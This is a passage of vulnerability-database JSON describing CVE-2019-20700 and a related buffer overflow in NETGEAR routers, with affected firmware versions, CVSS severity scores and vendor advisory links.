],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB84CB9C-DA5C-4D18-9A54-375DD091D932",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CA2B4B5-ED8D-476F-9F6E-630B43A38E27",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "103B19E9-C72D-43C2-8369-1C425E9B9AC7",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E23D8A41-75D8-4067-A961-3B81276527A8",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E59E66D2-7E73-45C8-8D3E-FE589CDBECA4",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94B3A9D8-A276-41B2-B7BF-7DA58B879A9B",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0675F6C4-EB61-4DA3-8473-448E93D5E0A5",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "46D1F73B-1AE0-40AE-BED7-CAE3C7EFEE3B",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E338A30-C349-41B4-B971-E6D6B0E9AFE4",
"versionEndExcluding": "1.2.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900P before 1.3.0.10, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un atacante no autenticado. Esto afecta a D6220 versiones anteriores a 1.0.0.44, D6400 versiones anteriores a 1.0.0.78, D7000v2 versiones anteriores a 1.0.0.51, D8500 versiones anteriores a 1.0.3.42, DGN2200v4 versiones anteriores a 1.0.0.110, DGND2200Bv4 versiones anteriores a 1.0.0.110, EX3700 versiones anteriores a 1.0.0.70, EX3800 versiones anteriores a 1.0.0.70, EX6000 versiones anteriores a 1. 0,0,30, EX6100 versiones anteriores a 1.0.2.24, EX6120 versiones anteriores a 1.0.0.40, EX6130 versiones anteriores a 1.0.0.22, EX6150v1 versiones anteriores a 1.0.0.42, EX6200 versiones anteriores a 1.0.3.88, EX7000 versiones anteriores a 1.0.0.66, R6250 versiones anteriores a 1.0.4.26, R6300v2 versiones anteriores a 1.0.4.28, R6400 versiones anteriores a 1. 0.1.36, R6400v2 versiones anteriores a 1.0.2.52, R6700 versiones anteriores a 1.0.1.46, R6900 versiones anteriores a 1.0.1.46, R7000 versiones anteriores a 1.0.9.28, R7900 versiones anteriores a 1.0.2.10, R8000 versiones anteriores a 1.0.4.12, R8300 versiones anteriores a 1.0.2.122, R8500 versiones anteriores a 1.0.2.122, R6900P versiones anteriores a 1.3. 1.64, R7000P versiones anteriores a 1.3.1.64, R7100LG versiones anteriores a 1.0.0.46, R7300DST versiones anteriores a 1.0.0.68, R7900P versiones anteriores a 1.3.0.10, R8000P versiones anteriores a 1.3.0.10, WN2500RPv2 versiones anteriores a 1.0.1.54, WNDR3400v3 versiones anteriores a 1.0.1.22, y WNR3500Lv2 versiones anteriores a 1.2.0.54."
}
],
"id": "CVE-2019-20700",
"lastModified": "2024-11-21T04:39:07.000",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
"exploitabilityScore": 0.8,
"impactScore": 4.7,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T19:15:23.947",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061194/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2018"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061194/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2018"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 22:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects DGN2200 before 1.0.0.58, DGN2200B before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.80, D6220 before 1.0.0.44, EX7000 before 1.0.0.66, EX6200 before 1.0.3.88, EX6150 before 1.0.0.42, EX7500 before 1.0.0.46, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900P before 1.4.0.10, R8000P before 1.4.0.10, R7900 before 1.0.2.16, R7000P before 1.3.1.44, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.1.44, R7000 before 1.0.9.32, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.54.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "99288EE6-3A88-4134-992D-148868117AFC",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "37C89394-ED7D-4C5F-9573-47A0378E22C8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "082AB982-1EF7-417D-88CD-21F3860AF8C4",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C85C6885-636D-4583-AEEF-FC23D93CCC35",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "629E89E8-F329-4D11-9652-540752084DD3",
"versionEndExcluding": "1.0.3.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52FB0300-0FC9-4797-BACB-84D7D932A386",
"versionEndExcluding": "1.0.0.51",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "76FA59AE-35D5-443C-8C05-3989DD59B32F",
"versionEndExcluding": "1.0.0.80",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "114EDC62-9DAE-45D9-8A90-A533BBBF50EB",
"versionEndExcluding": "1.0.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "46452E97-9347-4788-9570-1EECECC7255E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "71D30090-F8C2-47F0-991C-FEDD3D9C3864",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "44336289-F9DA-4779-8C1A-0221E29E2E2F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jndr3000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07C1E707-AB63-4812-9BBC-7267AD17BFF9",
"versionEndExcluding": "1.0.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jndr3000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DEEEEE5-0798-450E-BF9D-B17A15235C80",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C5FC237-F74C-4771-B5D3-36CF245C0396",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CA2B4B5-ED8D-476F-9F6E-630B43A38E27",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB84CB9C-DA5C-4D18-9A54-375DD091D932",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E0102F4-A45E-4715-8D3F-4DC96EC5865C",
"versionEndExcluding": "1.4.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2D59690E-4182-40B0-872C-8392352C0B00",
"versionEndExcluding": "1.4.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "471E4F42-7114-4A7F-832D-2E9222BD25B4",
"versionEndExcluding": "1.0.2.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "90805FFE-E59D-43D2-BF1E-D55458CF05BF",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94B3A9D8-A276-41B2-B7BF-7DA58B879A9B",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E59E66D2-7E73-45C8-8D3E-FE589CDBECA4",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52A6DEB2-3A33-4184-866D-9C8D9DD991C6",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B1C19D9-9195-4C24-B346-10AAC4106B89",
"versionEndExcluding": "1.0.9.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FF0010-66E3-485C-A22B-39E57E738550",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E821B01-31C8-4766-BAAF-D814336617B9",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "203541F7-8AC5-436A-808E-935B03B00E8D",
"versionEndExcluding": "1.0.2.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "741413AB-9519-4BBE-BEDB-DFA2077BAF79",
"versionEndExcluding": "1.0.1.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "502055F1-F919-4C91-A3D0-B144027BC690",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
